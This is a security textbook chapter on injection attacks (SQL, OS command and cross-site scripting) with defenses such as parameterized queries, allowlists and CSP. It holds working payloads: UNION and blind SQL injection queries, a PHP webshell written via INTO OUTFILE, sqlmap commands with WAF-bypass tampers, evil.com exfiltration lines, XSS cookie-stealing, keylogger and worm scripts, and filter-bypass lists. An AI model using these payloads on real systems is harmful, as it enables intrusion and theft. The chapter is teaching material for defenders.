Chapter 19: Injection Attacks -- When User Input Becomes Code
"All input is evil until proven otherwise." -- Michael Howard, Writing Secure Code
OWASP has had injection in their Top 10 since 2003. In 2023, it was still there -- just renamed to "Injection" to cover all the flavors. It is the cockroach of vulnerabilities. A single misplaced quote mark can bring down a company. This chapter shows you why.
The Anatomy of Injection
Injection attacks occur whenever untrusted data is sent to an interpreter as part of a command or query. The interpreter cannot distinguish between the intended code and the attacker's payload. This is not a bug in a specific language or framework -- it is a category of architectural failure.
Injection is fundamentally a **trust boundary violation**. Whenever data crosses from an untrusted zone (user input, external API, file upload) into an interpreter (SQL engine, OS shell, HTML renderer, LDAP directory), the boundary must enforce that data remains data and never becomes executable instructions.
The formal name in academic security literature is a **confused deputy problem**: the interpreter (the deputy) is confused into treating data as instructions because it has no way to distinguish between the two once they are concatenated together.
The three conditions for injection:
- Untrusted input -- data the application does not fully control
- String concatenation or interpolation -- mixing data with code in the same channel
- An interpreter -- something that parses and executes the mixed result
Remove any one of these three, and injection becomes impossible.
graph TD
A[Untrusted Input] --> D{String Concatenation?}
B[Application Code / Template] --> D
D -->|Yes| E[Mixed String Sent to Interpreter]
D -->|No - Parameterized| F[Data Sent Separately from Code]
E --> G[Interpreter Cannot Distinguish Data from Code]
G --> H[INJECTION POSSIBLE]
F --> I[Interpreter Treats Data as Data Only]
I --> J[INJECTION IMPOSSIBLE]
style H fill:#ff6b6b,stroke:#c0392b,color:#fff
style J fill:#2ecc71,stroke:#27ae60,color:#fff
SQL Injection: The Granddaddy of Them All
Classic (In-Band) SQL Injection
Consider a login form that builds its query by concatenating user input directly into SQL:
# VULNERABLE CODE -- DO NOT USE
username = request.form['username']
password = request.form['password']
query = f"SELECT * FROM users WHERE username = '{username}' AND password = '{password}'"
cursor.execute(query)
What does the attacker type? Suppose they enter this as the username:
' OR '1'='1' --
The resulting query becomes:
SELECT * FROM users WHERE username = '' OR '1'='1' --' AND password = ''
The -- comments out the rest of the query. '1'='1' is always true. The database returns every user. The application typically logs in as the first user -- often the admin.
sequenceDiagram
participant Attacker
participant WebApp as Web Application
participant DB as Database Engine
Attacker->>WebApp: POST /login<br/>username: ' OR '1'='1' --<br/>password: anything
WebApp->>WebApp: Concatenate input into SQL string
Note over WebApp: query = "SELECT * FROM users<br/>WHERE username = '' OR '1'='1' --<br/>AND password = 'anything'"
WebApp->>DB: Execute concatenated query
DB->>DB: Parse query -- OR condition always true
DB->>DB: -- comments out password check
DB-->>WebApp: Returns ALL rows from users table
WebApp-->>Attacker: Login successful (as first user, typically admin)
How the SQL Parser Sees It
Understanding why injection works requires understanding how a SQL parser operates. When the database receives a query string, it performs lexical analysis -- breaking the string into tokens. Here is how the parser tokenizes the injected query:
Token 1: SELECT (keyword)
Token 2: * (wildcard)
Token 3: FROM (keyword)
Token 4: users (identifier)
Token 5: WHERE (keyword)
Token 6: username (identifier)
Token 7: = (operator)
Token 8: '' (string literal -- empty)
Token 9: OR (keyword -- INJECTED)
Token 10: '1'='1' (comparison -- INJECTED, always true)
Token 11: -- (comment -- INJECTED, kills rest of query)
The parser has no way to know that tokens 9, 10, and 11 were not intended by the developer. They are syntactically valid SQL. The attacker has changed the structure of the query -- turning an AND condition into an OR condition -- by injecting SQL syntax through a data channel.
UNION-Based SQL Injection
When the application displays query results, attackers use UNION SELECT to append results from other tables. The key requirement: the number of columns in the UNION must match the original query.
Step 1 -- Determine column count using ORDER BY:
' ORDER BY 1 -- (works -- table has at least 1 column)
' ORDER BY 2 -- (works -- at least 2 columns)
' ORDER BY 3 -- (works -- at least 3 columns)
' ORDER BY 4 -- (error -- table has exactly 3 columns)
Step 2 -- Confirm column count with NULL UNION:
' UNION SELECT NULL, NULL, NULL -- (works -- 3 columns confirmed)
Step 3 -- Find columns that display string data:
' UNION SELECT 'test1', NULL, NULL -- (check if column 1 shows strings)
' UNION SELECT NULL, 'test2', NULL -- (check if column 2 shows strings)
' UNION SELECT NULL, NULL, 'test3' -- (check if column 3 shows strings)
Step 4 -- Extract database metadata:
-- List all tables in the database
' UNION SELECT table_name, NULL, NULL FROM information_schema.tables --
-- List columns for a specific table
' UNION SELECT column_name, data_type, NULL FROM information_schema.columns
WHERE table_name = 'users' --
-- Extract actual data
' UNION SELECT username, password, email FROM users --
Step 5 -- Escalate to database-level compromise:
-- Read files from the filesystem (MySQL)
' UNION SELECT LOAD_FILE('/etc/passwd'), NULL, NULL --
-- Write a webshell (MySQL with FILE privilege)
' UNION SELECT '<?php system($_GET["cmd"]); ?>', NULL, NULL
INTO OUTFILE '/var/www/html/shell.php' --
-- Execute OS commands (MSSQL xp_cmdshell)
'; EXEC xp_cmdshell 'whoami' --
-- Extract database version (fingerprinting)
' UNION SELECT version(), NULL, NULL -- -- MySQL/PostgreSQL
' UNION SELECT @@version, NULL, NULL -- -- MSSQL
' UNION SELECT banner FROM v$version, NULL, NULL -- -- Oracle
graph TD
A[Find Injection Point] --> B[Determine Column Count<br/>ORDER BY N]
B --> C[Confirm with UNION SELECT NULL...]
C --> D[Identify String-Displayable Columns]
D --> E[Extract Database Metadata<br/>information_schema.tables]
E --> F[Extract Column Names<br/>information_schema.columns]
F --> G[Dump Table Data<br/>UNION SELECT col1, col2 FROM target]
G --> H{Database Privileges?}
H -->|FILE privilege| I[Read/Write Server Files<br/>LOAD_FILE, INTO OUTFILE]
H -->|xp_cmdshell MSSQL| J[Execute OS Commands]
H -->|DBA privileges| K[Full Database Compromise]
I --> L[Webshell Upload → RCE]
J --> L
style L fill:#ff6b6b,stroke:#c0392b,color:#fff
Through UNION injection, an attacker can map the entire database schema just through a single vulnerable input field. Every table, every column, every row. The information_schema is a gold mine. And depending on database permissions, they can read files, write files, or even execute operating system commands. A SQL injection can escalate from "read some data" to "full server compromise" in a single session.
Blind SQL Injection
Sometimes the application does not display query results -- it only shows "login successful" or "login failed." The attacker cannot see the data directly, but they can still extract it one bit at a time.
Boolean-Based Blind SQLi:
The attacker asks the database yes/no questions by observing the application's behavior:
-- Is the first character of the admin's password 'a'?
' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin') = 'a' --
-- If the page shows "login successful" → first character is 'a'
-- If the page shows "login failed" → first character is NOT 'a'
-- Repeat for 'b', 'c', 'd', ... then move to character position 2, 3, ...
A more efficient approach uses binary search with ASCII values:
-- Is the ASCII value of the first character greater than 'm' (109)?
' AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)) > 109 --
-- If true: character is between 'n' (110) and 'z' (122) -- next check > 'r'
-- If false: character is between ' ' (32) and 'm' (109) -- next check > 'g'
-- Binary search: extract each character in ~7 requests instead of ~95
Time-Based Blind SQLi:
When even boolean responses are not distinguishable -- the page looks identical regardless of query result -- the attacker uses time delays:
-- MySQL
' AND IF(SUBSTRING(password,1,1)='a', SLEEP(5), 0) --
-- PostgreSQL
' AND CASE WHEN SUBSTRING(password,1,1)='a'
THEN pg_sleep(5) ELSE pg_sleep(0) END --
-- MSSQL
' AND IF SUBSTRING(password,1,1)='a' WAITFOR DELAY '0:0:5' --
If the response takes 5 seconds, the character matches. If it returns immediately, it does not.
sequenceDiagram
participant Attacker
participant WebApp as Web Application
participant DB as Database
Note over Attacker: Extracting admin password, char by char
Attacker->>WebApp: ' AND IF(SUBSTR(pw,1,1)='a', SLEEP(5), 0) --
WebApp->>DB: Execute query
DB-->>WebApp: Instant response (0.02s)
WebApp-->>Attacker: Response in 0.02s → char 1 ≠ 'a'
Attacker->>WebApp: ' AND IF(SUBSTR(pw,1,1)='s', SLEEP(5), 0) --
WebApp->>DB: Execute query
Note over DB: SLEEP(5) triggered
DB-->>WebApp: Response after 5.01s
WebApp-->>Attacker: Response in 5.01s → char 1 = 's'
Note over Attacker: Move to character 2...<br/>Repeat for entire password hash<br/>32-char hash = ~224 requests (binary search)<br/>Automated by sqlmap
This is slow -- extracting a 32-character hash takes hundreds of requests -- but sqlmap automates it completely.
Set up a deliberately vulnerable application using DVWA (Damn Vulnerable Web Application) or WebGoat. Try these injection techniques against a controlled target. Use `sqlmap` to automate blind injection:
~~~bash
# Install sqlmap
pip install sqlmap
# Detect injection point and enumerate databases
sqlmap -u "http://localhost:8080/vulnerable?id=1" --dbs --batch
# List tables in a specific database
sqlmap -u "http://localhost:8080/vulnerable?id=1" -D testdb --tables --batch
# Dump a specific table
sqlmap -u "http://localhost:8080/vulnerable?id=1" -D testdb -T users --dump --batch
# Test POST parameters
sqlmap -u "http://localhost:8080/login" \
--data="username=test&password=test" \
--batch --level=3 --risk=2
# Test with authenticated session
sqlmap -u "http://localhost:8080/api/data?id=1" \
--cookie="session=abc123" --batch
# Use tamper scripts to bypass WAFs
sqlmap -u "http://localhost:8080/vulnerable?id=1" \
--tamper=space2comment,between,randomcase --batch
# Verbose output to see every request sqlmap makes
sqlmap -u "http://localhost:8080/vulnerable?id=1" -v 3 --batch
~~~
Observe how sqlmap determines the injection point, identifies the database type, selects the optimal extraction technique, and extracts data through hundreds of automated requests.
**CRITICAL:** Only use sqlmap against systems you own or have explicit written authorization to test. Unauthorized testing is illegal under the Computer Fraud and Abuse Act (US), Computer Misuse Act (UK), and equivalent laws in most countries.
Second-Order SQL Injection
Second-order injection is particularly nasty because it evades most surface-level testing. The malicious payload survives storage and detonates later.
In second-order injection, the malicious payload is stored safely in the database during the first operation, then executed when a different operation retrieves and uses it.
Step 1 -- Registration (safe storage):
A user registers with username: admin'--
The registration query uses parameterized queries (safe):
INSERT INTO users (username, email) VALUES ($1, $2)
-- Stores the literal string admin'-- in the database
The literal string admin'-- is stored correctly. No injection during registration.
Step 2 -- Password change (vulnerable retrieval):
# Developer assumes database values are "trusted"
username = get_current_user_from_session() # Returns "admin'--" from DB
# VULNERABLE -- concatenates "trusted" database value into SQL
query = f"UPDATE users SET password = '{new_password}' WHERE username = '{username}'"
The query becomes:
UPDATE users SET password = 'newpass123' WHERE username = 'admin'--'
This changes the real admin's password, not the attacker's account.
sequenceDiagram
participant Attacker
participant WebApp as Web Application
participant DB as Database
Note over Attacker: Phase 1: Plant the payload
Attacker->>WebApp: Register as username: admin'--
WebApp->>DB: INSERT INTO users (username) VALUES ($1)<br/>Parameterized -- safe
DB-->>WebApp: OK -- stored "admin'--" literally
WebApp-->>Attacker: Registration successful
Note over Attacker: Phase 2: Trigger the payload
Attacker->>WebApp: Change password to "hacked123"
WebApp->>DB: SELECT username FROM sessions WHERE...<br/>Returns "admin'--"
WebApp->>WebApp: Build query by concatenation:<br/>UPDATE users SET password='hacked123'<br/>WHERE username='admin'--'
WebApp->>DB: Execute concatenated query
Note over DB: -- comments out trailing quote<br/>WHERE username='admin'<br/>Updates REAL admin's password!
DB-->>WebApp: 1 row updated
WebApp-->>Attacker: Password changed
Note over Attacker: Phase 3: Profit
Attacker->>WebApp: Login as admin / hacked123
WebApp-->>Attacker: Welcome, administrator!
The lesson: all data is untrusted, even data from your own database. Parameterize every query, not just the ones that touch user input directly.
In 2015, a healthcare startup had perfect parameterized queries on all their web forms. Gold star. But their nightly reporting job pulled patient names from the database and concatenated them into dynamic SQL for generating PDF reports. A researcher registered a patient named `Robert'; DROP TABLE appointments;--` and the next morning, every appointment in the system was gone. The backup restoration process? Also generated by a SQL query that concatenated table names. They lost three months of scheduling data.
The root cause was a common misconception: "data in my own database is trustworthy." It is not. Data in your database arrived from *somewhere* -- user input, API calls, file imports, partner feeds. Every time that data is used in a query, it must be parameterized, regardless of its origin.
Real-World SQL Injection Breaches
This is not academic. SQL injection has been the primary attack vector in some of the largest data breaches in history:
- Heartland Payment Systems (2008): SQL injection led to the theft of 130 million credit card numbers. Estimated cost: $140 million. The attacker, Albert Gonzalez, was sentenced to 20 years in prison.
- Sony PlayStation Network (2011): SQL injection was the initial attack vector. 77 million accounts compromised. PSN was offline for 23 days. Sony estimated the breach cost $171 million.
- TalkTalk (2015): A 17-year-old used SQL injection to steal personal data of 157,000 customers. The company was fined £400,000 by the ICO and lost 100,000 subscribers.
- Equifax (2017): While the primary entry point was Apache Struts, SQL injection was used in post-exploitation to navigate the database and extract 147 million records including Social Security numbers.
- Accellion FTA (2021): SQL injection in a legacy file transfer appliance led to breaches at dozens of organizations including Shell, Kroger, Morgan Stanley, and the Reserve Bank of New Zealand.
The Real Fix: Parameterized Queries
Why Escaping Fails
Escaping attempts to neutralize dangerous characters by adding backslashes or doubling quotes. It fails because:
-
Character set issues: Multi-byte character encodings like GBK can produce a valid quote after escaping. The
addslashes()function in PHP was famously vulnerable to this. The byte sequence0xbf5cin GBK represents a valid character followed by a backslash -- afteraddslashes()adds a backslash before a single quote, the0xbfconsumes the backslash as part of a multi-byte character, leaving the quote un-escaped. -
Context sensitivity: Different parts of a SQL query require different escaping rules:
- String literals: escape single quotes
- Numeric values: no quotes at all (escaping is irrelevant)
- Identifiers (table/column names): use backticks (MySQL) or double quotes (PostgreSQL)
- LIKE clauses: escape
%and_in addition to quotes - ORDER BY: cannot be parameterized in most databases -- requires allowlist validation
-
Human error: Developers forget to escape one input out of hundreds. One miss is all an attacker needs.
-
Second-order attacks: Escaping happens at input time, not at query construction time. Data stored safely can be dangerous when retrieved and concatenated later.
-
Database-specific syntax: Each database has unique escaping requirements. What works for MySQL may not work for PostgreSQL, MSSQL, or Oracle. Escaping assumes knowledge of the exact database and version.
How Parameterized Queries Work at the Protocol Level
Parameterized queries separate the SQL structure from the data at the protocol level. The database engine receives the query template and the data values through different channels. The data cannot alter the query structure because the query is already compiled before the data arrives.
Under the hood, parameterized queries use a two-phase protocol. In PostgreSQL's extended query protocol:
**Phase 1 -- Parse:**
The client sends a Parse message containing:
SELECT * FROM users WHERE username = $1 AND password = $2
The server compiles this into an execution plan. The plan structure is **fixed** -- it contains two placeholder nodes where data values will be inserted. The parser has already determined the query structure: a SELECT with two equality conditions joined by AND.
**Phase 2 -- Bind:**
The client sends a Bind message containing the parameter values:
$1 = "admin" $2 = "pass123"
The server inserts these values into the pre-compiled plan as **data values**, not as SQL syntax. The values are never parsed as SQL.
Even if $1 contains `' OR '1'='1' --`, the execution plan does not change. The database compares the username column against the literal string `' OR '1'='1' --` and finds no match. The attack payload is treated as data -- exactly as intended.
This is the fundamental difference from string concatenation: with parameterization, the query structure is determined **before** the data is seen. No amount of creative input can alter the structure.
graph LR
subgraph "String Concatenation (VULNERABLE)"
A1[SQL Template] --> C1[Concatenate]
B1[User Input] --> C1
C1 --> D1[Single String]
D1 --> E1[Parser]
E1 --> F1[Execution Plan]
style D1 fill:#ff6b6b,stroke:#c0392b,color:#fff
end
subgraph "Parameterized Query (SAFE)"
A2[SQL Template] --> E2[Parser]
E2 --> F2[Fixed Execution Plan]
B2[User Input] --> G2[Bind Values]
G2 --> F2
style F2 fill:#2ecc71,stroke:#27ae60,color:#fff
end
Parameterized Query Examples Across Languages
Python (psycopg2 -- PostgreSQL):
cursor.execute(
"SELECT * FROM users WHERE username = %s AND password = %s",
(username, hashed_password)
)
Python (SQLAlchemy -- any database):
from sqlalchemy import text
result = session.execute(
text("SELECT * FROM users WHERE username = :user AND password = :pw"),
{"user": username, "pw": hashed_password}
)
Java (PreparedStatement):
PreparedStatement stmt = conn.prepareStatement(
"SELECT * FROM users WHERE username = ? AND password = ?"
);
stmt.setString(1, username);
stmt.setString(2, hashedPassword);
ResultSet rs = stmt.executeQuery();
Node.js (pg -- PostgreSQL):
const result = await pool.query(
'SELECT * FROM users WHERE username = $1 AND password = $2',
[username, hashedPassword]
);
Go (database/sql):
row := db.QueryRow(
"SELECT * FROM users WHERE username = $1 AND password = $2",
username, hashedPassword,
)
Ruby (ActiveRecord):
User.where("username = ? AND password = ?", username, hashed_password)
C# (SqlCommand):
var cmd = new SqlCommand(
"SELECT * FROM users WHERE username = @user AND password = @pw", conn
);
cmd.Parameters.AddWithValue("@user", username);
cmd.Parameters.AddWithValue("@pw", hashedPassword);
ORM Safety and Pitfalls
ORMs like SQLAlchemy, Django ORM, ActiveRecord, and Hibernate use parameterized queries by default:
# Django -- safe by default
User.objects.filter(username=username, password=hashed_password)
# SQLAlchemy -- safe by default
session.query(User).filter(User.username == username).first()
But ORMs also provide raw query escape hatches that reintroduce injection risk:
# Django -- VULNERABLE if you use raw() with f-strings
User.objects.raw(f"SELECT * FROM users WHERE username = '{username}'")
# Django -- safe raw query with parameters
User.objects.raw("SELECT * FROM users WHERE username = %s", [username])
# Django -- VULNERABLE extra() with string formatting
User.objects.extra(where=[f"username = '{username}'"])
# SQLAlchemy -- VULNERABLE text() with f-strings
session.execute(text(f"SELECT * FROM users WHERE name = '{name}'"))
# SQLAlchemy -- safe text() with bound parameters
session.execute(text("SELECT * FROM users WHERE name = :name"), {"name": name})
The ORM protects you unless you go out of your way to bypass it. And developers bypass it more often than you would think -- for "performance" or "complex queries." Every raw SQL string in a codebase is a potential injection point. Consider adding a pre-commit hook that greps for f"SELECT, .raw(f", and .extra(where= and blocks the commit. Flag them all in code review.
The Limits of Parameterization
Parameterized queries cannot be used everywhere. Table names, column names, and ORDER BY clauses cannot be parameterized in most databases:
# CANNOT parameterize table names
# This will NOT work:
cursor.execute("SELECT * FROM %s WHERE id = %s", (table_name, id))
# Solution: allowlist validation
ALLOWED_TABLES = {'users', 'orders', 'products'}
if table_name not in ALLOWED_TABLES:
raise ValueError(f"Invalid table: {table_name}")
cursor.execute(f"SELECT * FROM {table_name} WHERE id = %s", (id,))
# CANNOT parameterize ORDER BY
# Solution: allowlist validation
ALLOWED_SORT_COLUMNS = {'name', 'created_at', 'price'}
ALLOWED_DIRECTIONS = {'ASC', 'DESC'}
if sort_col not in ALLOWED_SORT_COLUMNS or sort_dir not in ALLOWED_DIRECTIONS:
raise ValueError("Invalid sort parameters")
cursor.execute(
f"SELECT * FROM products WHERE category = %s ORDER BY {sort_col} {sort_dir}",
(category,)
)
Defense in Depth for SQL Injection
Parameterized queries are the primary defense, but apply these additional layers:
-
Least privilege database accounts: The application's database user should never have
DROP TABLE,GRANT,FILE, orSUPERpermissions. Use separate accounts for read and write operations. The application account should only haveSELECT,INSERT,UPDATE,DELETEon specific tables. -
Input validation: Validate that an email looks like an email, an ID is numeric, a name matches expected patterns. This catches bugs, reduces attack surface, and provides defense against the rare cases where parameterization is not possible.
-
Web Application Firewall (WAF): Can block known injection patterns, but treat as a safety net, not the primary defense. WAFs can be bypassed through encoding, obfuscation, and protocol tricks.
-
Stored procedures: When used correctly with parameterized inputs, they enforce the query structure at the database level. But stored procedures that concatenate internally are just as vulnerable:
-- VULNERABLE stored procedure
CREATE PROCEDURE GetUser(IN uname VARCHAR(100))
BEGIN
SET @query = CONCAT('SELECT * FROM users WHERE username = ''', uname, '''');
PREPARE stmt FROM @query;
EXECUTE stmt;
END
-- SAFE stored procedure
CREATE PROCEDURE GetUser(IN uname VARCHAR(100))
BEGIN
SELECT * FROM users WHERE username = uname;
END
- Error handling: Never expose database error messages to users. They reveal table names, column types, database versions, and query structure -- all valuable to an attacker performing injection.
# Test for verbose error messages
curl -v "https://example.com/api/users?id=1'"
# If the response contains "MySQL syntax error", "pg_query",
# "ORA-", or "Microsoft SQL Server" -- you have an information leak
Command Injection and OS Command Injection
SQL is not the only interpreter. What happens when your application shells out to the operating system?
The Mechanics
Many applications execute OS commands by passing user input to a shell:
# VULNERABLE -- DO NOT USE
import os
filename = request.args.get('filename')
os.system(f"convert {filename} output.pdf")
An attacker supplies:
report.png; cat /etc/passwd; echo
The resulting command:
convert report.png; cat /etc/passwd; echo output.pdf
The semicolon terminates the first command and starts a new one. The server executes cat /etc/passwd with whatever privileges the web application runs under.
Command injection operators and their behavior:
| Operator | Behavior | Example |
|---|---|---|
; | Sequential execution | cmd1; cmd2 |
&& | Execute second if first succeeds | cmd1 && cmd2 |
|| | Execute second if first fails | cmd1 || cmd2 |
| | Pipe output to second command | cmd1 | cmd2 |
$(cmd) | Command substitution | echo $(whoami) |
`cmd` | Command substitution (backticks) | echo `whoami` |
\n | Newline -- starts new command | cmd1\ncmd2 |
> file | Redirect output (overwrite) | cmd > /tmp/data |
>> file | Redirect output (append) | cmd >> /tmp/log |
Out-of-Band Command Injection
When command output is not visible in the response, attackers use out-of-band techniques to exfiltrate data:
# DNS-based exfiltration -- the attacker controls evil.com's DNS
; nslookup $(whoami).evil.com
# The DNS query reveals the username in the subdomain
# HTTP-based exfiltration
; curl https://evil.com/log?data=$(cat /etc/passwd | base64)
# Time-based detection (like blind SQLi)
; sleep 5
# If response takes 5 extra seconds, command injection exists
# File-based -- write output to a web-accessible location
; ls -la > /var/www/html/output.txt
graph TD
A[User Input] --> B{Application uses shell?}
B -->|os.system / shell=True| C[Input injected into shell command]
B -->|subprocess with list args| D[Input is single argument -- SAFE]
C --> E{Shell metacharacters?}
E -->|; && || etc.| F[Attacker's command executes]
E -->|None found| G[Normal execution]
F --> H{Output visible?}
H -->|Yes| I[Direct data theft]
H -->|No| J[Out-of-band exfiltration<br/>DNS / HTTP / Time-based]
style D fill:#2ecc71,stroke:#27ae60,color:#fff
style F fill:#ff6b6b,stroke:#c0392b,color:#fff
Real Examples
ImageMagick (ImageTragick, CVE-2016-3714): ImageMagick used system() calls internally for certain file format conversions. A specially crafted image file could execute arbitrary commands:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|ls "-la)'
pop graphic-context
This led to remote code execution on servers processing image uploads -- including many major web platforms. The impact was massive because ImageMagick is one of the most widely deployed image processing libraries.
ShellShock (CVE-2014-6271): The Bash shell itself had an injection vulnerability. Environment variables containing function definitions would execute trailing commands:
env x='() { :;}; echo VULNERABLE' bash -c "echo test"
CGI scripts that passed HTTP headers as environment variables became remotely exploitable. The User-Agent header could contain shell commands that the server would execute:
curl -A '() { :;}; /bin/cat /etc/passwd' http://target.com/cgi-bin/test.cgi
Defending Against Command Injection
Primary defense: avoid shelling out entirely.
# Instead of os.system("convert ..."), use a library
from PIL import Image
img = Image.open(filename)
img.save("output.pdf")
When you absolutely must execute system commands:
# SAFE -- Use subprocess with a list (no shell interpretation)
import subprocess
result = subprocess.run(
["convert", filename, "output.pdf"],
check=True,
capture_output=True,
timeout=30 # Prevent hanging
)
# The filename is passed as a single argument to execve()
# No shell is involved -- metacharacters have no special meaning
Never pass `shell=True` to `subprocess.run()` or `subprocess.Popen()` with user-controlled input. When `shell=True`, the command is passed to `/bin/sh -c`, reintroducing all shell injection risks:
~~~python
# STILL VULNERABLE -- shell=True means shell interprets the string
subprocess.run(f"convert {filename} output.pdf", shell=True)
# SAFE -- list arguments, no shell
subprocess.run(["convert", filename, "output.pdf"])
# ALSO SAFE -- if you must use shell=True, use shlex.quote()
import shlex
subprocess.run(f"convert {shlex.quote(filename)} output.pdf", shell=True)
# But prefer the list form -- shlex.quote() is a defense layer, not the fix
~~~
Additional defenses:
- Allowlist validation: If the input should be a filename, verify it matches
^[a-zA-Z0-9._-]+$. Reject path separators, spaces, and special characters. - Chroot/sandbox: Run the process in a restricted filesystem with no access to sensitive files
- Drop privileges: Run the worker process as a dedicated low-privilege user with no shell access
- Containers: Isolate command execution in a container with minimal capabilities, read-only filesystem, no network access
- seccomp profiles: Restrict which system calls the process can make -- prevent
execveif the process should not spawn child processes
Cross-Site Scripting (XSS)
SQL injection targets the database. Command injection targets the OS. What about the browser? That is XSS -- Cross-Site Scripting. Instead of injecting into a server-side interpreter, you inject into the HTML/JavaScript interpreter running in another user's browser. The interpreter changes, but the fundamental mechanic is identical: untrusted data becomes executable code.
Reflected XSS
The malicious script is part of the request and reflected back in the response. The victim must click a crafted link.
Vulnerable server code:
@app.route('/search')
def search():
query = request.args.get('q', '')
return f"<h1>Results for: {query}</h1>"
Attack URL:
https://example.com/search?q=<script>document.location='https://evil.com/steal?cookie='+document.cookie</script>
The browser receives:
<h1>Results for: <script>document.location='https://evil.com/steal?cookie='+document.cookie</script></h1>
The script executes in the context of example.com, with access to example.com's cookies, localStorage, and DOM.
Real-world attack delivery methods:
# URL shortener to hide the payload
https://bit.ly/3xY7abc → long URL with XSS payload
# HTML-encoded to bypass email filters
https://example.com/search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E
# Data URI in markdown/HTML email
Click <a href="https://example.com/search?q=<script>...</script>">here</a>
Stored XSS
The payload is permanently stored on the server (in a database, comment field, forum post, user profile) and served to every user who views the page. Stored XSS is far more dangerous than reflected because it does not require the victim to click a crafted link -- they just visit a legitimate page.
sequenceDiagram
participant Attacker
participant WebApp as Web Application
participant DB as Database
participant Victim
Note over Attacker: Phase 1: Store the payload
Attacker->>WebApp: POST /comments<br/>body: Great article!<br/><script>fetch('https://evil.com',<br/>{method:'POST',body:document.cookie})</script>
WebApp->>DB: INSERT INTO comments (body) VALUES (...)
DB-->>WebApp: OK
Note over Victim: Phase 2: Victim visits the page
Victim->>WebApp: GET /article/123
WebApp->>DB: SELECT * FROM comments WHERE article_id=123
DB-->>WebApp: Returns comment with script payload
WebApp-->>Victim: HTML page with embedded <script>
Note over Victim: Browser parses HTML, executes script
Victim->>Attacker: POST https://evil.com<br/>body: session=abc123; csrf_token=xyz789
Note over Attacker: Attacker now has victim's session cookie
Attacker->>WebApp: GET /account<br/>Cookie: session=abc123
WebApp-->>Attacker: Victim's account page -- full access
Advanced stored XSS payloads:
<!-- Cookie theft -->
<script>
new Image().src='https://evil.com/log?c='+document.cookie;
</script>
<!-- Keylogger -->
<script>
document.addEventListener('keypress', function(e) {
new Image().src='https://evil.com/keys?k='+e.key;
});
</script>
<!-- Session riding -- perform actions as the victim -->
<script>
fetch('/api/transfer', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({to: 'attacker', amount: 10000}),
credentials: 'include'
});
</script>
<!-- Crypto miner -->
<script src="https://evil.com/coinhive.min.js"></script>
<!-- Worm -- self-propagating XSS -->
<script>
const payload = document.currentScript.outerHTML;
fetch('/api/profile', {
method: 'PUT',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({bio: payload}),
credentials: 'include'
});
</script>
The Samy Worm (2005): Samy Kamkar created a stored XSS worm on MySpace. His profile contained JavaScript that, when viewed, added "Samy is my hero" to the viewer's profile and copied the worm code. Within 20 hours, over one million profiles were infected -- the fastest-spreading worm in history at that time. It exploited the fact that MySpace allowed a limited subset of HTML but did not properly filter javascript: in CSS expressions and onclick handlers.
DOM-Based XSS
The vulnerability exists entirely in client-side JavaScript. The server never sees the payload, making it invisible to server-side WAFs and input validation.
// VULNERABLE client-side code
const name = document.location.hash.substring(1);
document.getElementById('greeting').innerHTML = 'Hello, ' + name;
Attack URL:
https://example.com/page#<img src=x onerror=alert(document.cookie)>
The fragment (#...) is never sent to the server. The client-side code reads it from document.location.hash and injects it into the DOM using innerHTML, which parses and executes it.
**Common DOM XSS sinks** (dangerous functions that execute or render input):
- `innerHTML`, `outerHTML` -- parse HTML, execute embedded scripts
- `document.write()`, `document.writeln()` -- write directly to document
- `eval()`, `setTimeout(string)`, `setInterval(string)` -- execute JavaScript
- `element.setAttribute('onclick', ...)` -- create event handlers
- `location.href = ...` -- navigate (dangerous with `javascript:` protocol)
- `jQuery.html()`, `$(selector).html()` -- jQuery's innerHTML equivalent
- `React.dangerouslySetInnerHTML` -- bypasses React's auto-escaping
- `v-html` in Vue.js -- bypasses Vue's auto-escaping
**Common DOM XSS sources** (attacker-controlled data):
- `document.location` (and `.hash`, `.search`, `.pathname`)
- `document.referrer`
- `window.name` -- persists across navigations, attacker can set it
- `postMessage` data -- from cross-origin windows
- Web storage (`localStorage`, `sessionStorage`) if populated from untrusted sources
- URL parameters parsed by client-side routers
**The fix for DOM XSS:**
- Use `textContent` instead of `innerHTML`
- Use `createElement` + `setAttribute` instead of string HTML building
- Sanitize with DOMPurify before using `innerHTML`
- Use framework bindings (React JSX, Vue templates) that auto-escape
XSS Filter Bypass Techniques
Attackers use numerous techniques to bypass XSS filters and WAFs:
<!-- Tag variations -->
<ScRiPt>alert(1)</ScRiPt>
<SCRIPT>alert(1)</SCRIPT>
<script/src=data:,alert(1)>
<!-- Event handlers (no script tag needed) -->
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<marquee onstart=alert(1)>
<details open ontoggle=alert(1)>
<!-- Encoding bypasses -->
<script>alert(String.fromCharCode(88,83,83))</script>
<script>eval(atob('YWxlcnQoMSk='))</script>
<a href="javascript:alert(1)">click</a>
<a href="javascript:alert(1)">click</a>
<!-- Null bytes and whitespace -->
<scr\0ipt>alert(1)</script>
<script\t>alert(1)</script>
<!-- Polyglot payloads (work in multiple contexts) -->
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//
XSS Defense
1. Output encoding (context-aware escaping):
The primary defense is encoding output based on the context where it will be rendered:
| Context | Encoding | Example |
|---|---|---|
| HTML body | < > & " ' | <p>Hello <script></p> |
| HTML attribute | Same + always quote attribute values | <input value=""injected""> |
| JavaScript string | \xHH unicode escaping | var x = "\x3cscript\x3e" |
| URL parameter | Percent encoding | ?q=%3Cscript%3E |
| CSS value | \HH escaping | background: url(\27javascript:alert\27) |
2. Template engines with auto-escaping:
# Jinja2 (Flask) -- auto-escapes by default
# {{ user_input }} is automatically HTML-encoded
# Use {{ user_input|safe }} ONLY when you explicitly trust the content
// React -- auto-escapes by default
// <div>{userInput}</div> is safe -- React escapes the string
// <div dangerouslySetInnerHTML={{__html: userInput}} /> is NOT
// The function name is deliberately scary as a warning
3. Content Security Policy (CSP):
CSP prevents inline script execution even if XSS exists. This is covered in depth in Chapter 20, but the key directive is:
Content-Security-Policy: script-src 'nonce-R4nd0mV4lu3'
Only <script nonce="R4nd0mV4lu3"> tags execute. Injected scripts without the nonce are blocked by the browser.
4. HttpOnly and SameSite cookies:
Set-Cookie: session=abc123; HttpOnly; Secure; SameSite=Strict
